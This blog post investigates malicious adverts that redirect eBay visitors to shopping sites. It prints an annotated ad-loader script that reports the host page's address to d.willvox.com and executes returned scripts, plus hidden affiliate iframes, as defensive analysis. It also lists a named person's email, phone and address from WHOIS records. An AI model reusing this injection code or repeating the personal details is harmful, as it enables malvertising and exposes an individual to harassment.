Rogue adverts redirecting ebay visitors off-site. (d.willvox.com and www.gamiss.com/?lkid=13368106)

UPDATE: THE SAME JUNK STARTED PLAYING MUSIC! see the new article

ebay gamiss advert page

Today while browsing eBay I was taken off the eBay site several times and onto “www.gamiss.com/?lkid=13368106”. I did not click or even mouse over any advert.

I’ve seen this happen about 3 or so times in the past year with eBay but today I had time to investigate and trace what is going on.

It looks like eBay is sending visitors to an advertising partner called “pubmatic.com”, which in turn sends the visitor to “mathtag.com”, which then serves advert JavaScript with content referencing “d.willvox.com” and “zaful.com”.

ebay request 1

ebay request 2

ebay request 3

ebay request 4

ebay request 5

The most interesting parts of the exchange are….

pubmatic.com returning the following Javascript:

https://tags.mathtag.com/notify/js?exch=pub&id=5aW95q2jLzE0LyAvTTJSaU9XVTNOR1F0TlRnME5TMDROV1V5TFRBd01EQXRNREF3TURBd01EQXdNREF3LzIwMDUzNzQ4NjYyMzQ4OTkxODMvNTM0NDE2My8yOTAzNjMxLzMvTkNYN2Nkai1NMnNVcXBoLVF2b3pkMnBkaHhDbEdlZUg4R2pkdVpSOXRrcy8xLzMvMTUxOTY2NjIwMC8wLzU3OTM1Ni8xMzU5MTA5NjMyLzIwMTAwMi80NDM4MDIvMS8wLzAvTURBd01EQXdNREF0TURBd01DMHdNREF3TFRBd01EQXRNREF3TURBd01EQXdNREF3LzAvMC8wLzAvMC8yMDA1Mzc0ODY2MjM0ODk5MTgzL3pyaC8/NVxI2XsTKGxAGahgZIG3pD1Qquo&sid=2903631&cid=5344163&nodeid=1135&price=0.091&group=eu&auctionid=2005374866234899183&bp=a_ajbcci&3pck=http://clicktrack.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=JnB1YklkPTE1NTIxMiZzaXRlSWQ9MTU1MjEzJmFkSWQ9OTUyMDE1JmthZHNpemVpZD0yMjUmdGxkSWQ9MzU0MDkzODUmY2FtcGFpZ25JZD0xNjczNSZjcmVhdGl2ZUlkPTAmYWRTZXJ2ZXJJZD0yNDMmaW1waWQ9RTQ4OTczRjYtREM2Ri00ODMyLTg1NkUtNjM5NkNCQTk1QzE4JnBhc3NiYWNrPTA=_url=

They reference tags.mathtag.com.. something to do with Math Media. An advertising agency or system.

Mathtag then send the following javascript:


<div class="script">
    
        // Ad-tag loader as quoted from the mathtag response. It assembles a query string from
        // ad-server macro slots plus the hosting page's URL/hostname, requests
        // https://d.willvox.com/?pid=<n>&... by XHR, and inserts whatever HTML comes back into
        // the document, re-creating any <script> elements found in it.
        // Analyst note: the response body is used as markup with no filtering, so the remote
        // host decides what is rendered and executed in this document.
        ! function() {
            // e: "am I framed?" flag, assigned in f(); t: base URL of the remote host;
            // n: value sent as the pid parameter; r: accumulated query parameters.
            // o / a / c: slot tables copied into r below. Bracketed values such as "[SUBID]"
            // look like ad-server macros that were never substituted -- TODO confirm.
            var e, t = "https://d.willvox.com",
                n = "5a40ca64fc0c4d14be22ffa8",
                r = {},
                o = {
                    10: "2005374866234899183",
                    9: "[SUBID]",
                    8: "https%3A//ebayadvertising.co.uk/",
                    7: "[LOCATION_LAT]",
                    6: "[LOCATION_LONG]",
                    5: "[DEVICEID]"
                },
                a = {
                    10: "2903631",
                    9: "5344163",
                    8: "[CUSTOM3]",
                    7: "[CUSTOM4]",
                    6: "[CUSTOM5]",
                    5: "[CUSTOM6]"
                },
                c = {
                    10: "[APP_NAME]",
                    9: "[IDFA]",
                    8: "[AID]"
                };
            try {
                // Copy o[10..5] to r.z10..z5 and a[10..5] to r.c10..c5, then c[10..8] to r.a10..a8.
                for (var d = 10; d > 4;) r["z" + d] = o[d], r["c" + d] = a[d], d--;
                for (d = 10; d > 7;) r["a" + d] = c[d], d--;
                // i: the slot values serialised as "&key=value" pairs. m is declared further down
                // in this same block; the call relies on function-declaration hoisting.
                var i = m(r);

                // Serialise an object's own enumerable properties as "&key=value&...", with each
                // value passed through encodeURIComponent. t is only initialised to "" when e is
                // an object, so any other input returns undefined.
                function m(e) {
                    var t, n;
                    for (var r in "object" == typeof e && (t = ""), e) e.hasOwnProperty(r) && (t = t + "&" + r + "=" + (n = e[r], encodeURIComponent(n)));
                    return t
                }

                // Return the outermost window: window.top when truthy, otherwise walk .parent.
                function p() {
                    if (window.top) return window.top;
                    for (var e = window; e.parent;) e = e.parent;
                    return e
                }

                // Best-effort lookup of the hosting page: full URL of the top document, then the
                // top window's hostname, then the last entry of location.ancestorOrigins. Each
                // step sits in its own try/catch and falls through to the next one if it throws.
                function s() {
                    try {
                        return p().document.location.href
                    } catch (e) {
                        try {
                            return p().location.hostname
                        } catch (e) {
                            return function() {
                                try {
                                    var e = window.parent.location.ancestorOrigins;
                                    if (e && e.length >= 1) return e[e.length - 1]
                                } catch (e) {}
                            }()
                        }
                    }
                }

                // Render the XHR result (e is the XMLHttpRequest passed in by h).
                // Non-empty body: wrap it in a <div> via innerHTML, append it to document.body,
                // hand every <script> inside to u(), then move the wrapper next to the
                // #adder-inisder placeholder and remove the placeholder.
                // Empty body: insert a static image (ad/zaful.jpg) next to the placeholder instead.
                // #adder-inisder is not created anywhere in this listing; presumably the
                // surrounding ad markup supplies it.
                // NOTE(review): the string literal assigned to innerHTML below is split over
                // several lines, which is not valid JavaScript -- this looks like page-rendering
                // damage to the quoted sample rather than how the script was served.
                function l(e) {
                    if ("" !== e.responseText) {
                        var t, n = document.createElement("div");
                        n.innerHTML = "

<div>" + e.responseText + "</div>

", n = n.firstChild, document.body.appendChild(n);
                        var r = document.getElementById("adder-inisder"),
                            o = n.getElementsByTagName("script");
                        if (o.length > 0)
                            for (var a = 0; a < o.length; ++a) {
                                u(o[a])
                            }
                        r.parentNode.appendChild(n), r.parentNode.removeChild(r)
                    } else {
                        (t = document.createElement("div")).className = "ad-serve-image", t.innerHTML = '<a>  <img src="https://d.willvox.com/ad/zaful.jpg" height="250" width="300"> </a>', document.getElementById("adder-inisder").parentNode.appendChild(t);
                        var c = document.getElementById("adder-inisder");
                        c.parentNode.removeChild(c)
                    }
                }

                // Swap a <script> element for a newly created one carrying the same inline text
                // or src. Scripts that arrive through innerHTML are not executed by the browser;
                // re-creating them with createElement is what makes the response's scripts run.
                function u(e) {
                    var t = document.createElement("script");
                    e && (e.text ? t.text = e.text : e.src && (t.src = e.src)), e.parentNode.appendChild(t), e.parentNode.removeChild(e)
                }

                // XHR onload handler (this is the XMLHttpRequest).
                // Status 200: pass the response to l().
                // Any other status: if the document is already complete, call f() again (a new
                // request); otherwise start a 140 ms poll that calls f() once the document is
                // complete, and pass the current response to l() in the meantime.
                function h() {
                    if (200 !== this.status) {
                        if ("complete" !== document.readyState) var e = setInterval(function() {
                            "complete" === document.readyState && (clearInterval(e), f())
                        }, 140);
                        "complete" === document.readyState ? f() : l(this)
                    } else l(this)
                }

                // Build the request URL and send it.
                // e becomes true when this window is not the top window, or when the comparison
                // itself throws. The URL starts as t + "/?pid=" + n.
                // Framed: mt = top document URL (else frames[0] referrer, else ""), hn = s() or "".
                // Not framed: hn = window.location.hostname, mt = og:url meta content or "".
                // The slot parameters in i are appended last, then a GET is issued with h as the
                // onload handler. Net effect: the hosting page's address is reported to
                // d.willvox.com on every load.
                function f() {
                    try {
                        e = !(window.self === window.top)
                    } catch (t) {
                        e = !0
                    }
                    var r = t.concat("/?pid=") + n,
                        o = {};
                    e ? (o.mt = function() {
                        try {
                            return p().document.URL
                        } catch (e) {
                            try {
                                return p().frames[0].document.referrer
                            } catch (e) {}
                        }
                    }() || "", o.hn = s() || "") : (o.hn = window.location.hostname, o.mt = function() {
                        try {
                            // NOTE(review): the <span id="mce_SELREST_start"> inside the loop condition
                            // looks like a blog-editor artifact in the quoted sample, not script content.
                            // NOTE(review): n.getAttribute.property reads a property off the function
                            // instead of calling getAttribute("property"), so the og:url comparison
                            // presumably never matches and mt falls back to "".
                            for (var e = document.getElementsByTagName("meta"), t = 0; t <span id="mce_SELREST_start" style="overflow:hidden;line-height:0;"></span>< e.length; t++) {
                                var n = e[t];
                                if ("og:url" === n.getAttribute.property) return n.getAttribute("content")
                            }
                        } catch (e) {}
                    }() || ""), r += m(o), r += i;
                    var a = new XMLHttpRequest;
                    a.onload = h, a.open("GET", r), a.send()
                }
                f()
            } catch (e) {
                // NOTE(review): zpscript is not defined anywhere in this listing; unless the
                // surrounding ad markup defines it, this cleanup line would itself throw.
                document.getElementById("adder-inisder").parentNode.removeChild(zpscript)
            }
        }();

This code looks like it is supposed to show the following advert: https://d.willvox.com/ad/zaful.jpg, possibly if the browser doesn’t support JavaScript(?) – although in the listing above that static image is the branch taken when the response from d.willvox.com comes back empty. It also triggers yet another request to https://d.willvox.com (see the last screenshot), which responds with:

<a href="http://s.click.aliexpress.com/e/JuvRrzb?bz=120*600" target="_parent"><img width="725" height="90" src="https://ae01.alicdn.com/kf/HTB1VhqnX1GSBuNjSspb763iipXaZ/EN_728_90.png"/></a>
<img width="725" height="90" src="http://s.click.aliexpress.com/e/JuvRrzb?bz=120*600&af=[URL]&cn=[CUSTOM1]&cv=[CUSTOM2]&dp=[CB]" style="display:none;">
<iframe src="https://www.gearbest.com/promotion-8-march-special-1216.html?lkid=13364449" style="display: none"></iframe>
<iframe src="https://www.zaful.com/m-promotion-active-valentines-sale.html?innerid=35&lkid=13266105" style="display:none"></iframe>
<iframe src="https://www.gamiss.com/?lkid=13368106" style="display:none"></iframe>
<iframe src="https://www.rosegal.com/promotion-christmas-sale.html?lkid=12369082" style="display:none"></iframe>

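And the deed is done. Something within the iframe for gamiss hijacks the entire page and takes you off eBay, presumably by navigating the top-level window, which a framed page can attempt unless the frame is sandboxed without `allow-top-navigation`; none of the hidden iframes above carry a sandbox attribute. It looks like an attempt to deploy affiliate cookies to people so that when, and if, they visit the websites referenced above and make a purchase – the person behind the junk adverts gets a kickback.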

Piss poor vetting and subsequent takedown of rogue adverts. This has been a problem for at least a couple of days at this point. eBay is what I’ve seen people refer to as a “dumpster fire”. Lacking competition and drive to do things right.

Looking into the domain involved more (d.willvox.com) it seems that the following person is the owner of the domain:

Email maheshrajiv@gmail.com 
Name Thevar
Organization Mahesh
Street Address
Matunga
Mumbai
Maharashtra
400019
India

Phone 919029929719

They also own other similarly named and fishy looking domains:

addtodeal.com
alfaimpl.com
ceworldwide.in
funderspool.com
funderspool.in
grannyssecretrecipes.com
iafm.in
indiaftv.com
indiaftv.in
indianfashion.tv
internationalmediaplanet.com
juiceelement.in
mychildmyworld.com
panchakarma.online
runwayagency.com
saiproductionsbudapest.com
shivgarjana.in
squareroof.com
termzero.com
themostmodels.com
v7remedy.com
visioncorpltd.com
visioncorptv.com
visioncorptv.net
visionre.in
wildvox.com

1 Response to Rogue adverts redirecting ebay visitors off-site. (d.willvox.com and www.gamiss.com/?lkid=13368106)

  1. Pingback: eBay: zaful advert playing music automatically (another d.willvox.com malicious advert) | thecomputerperson
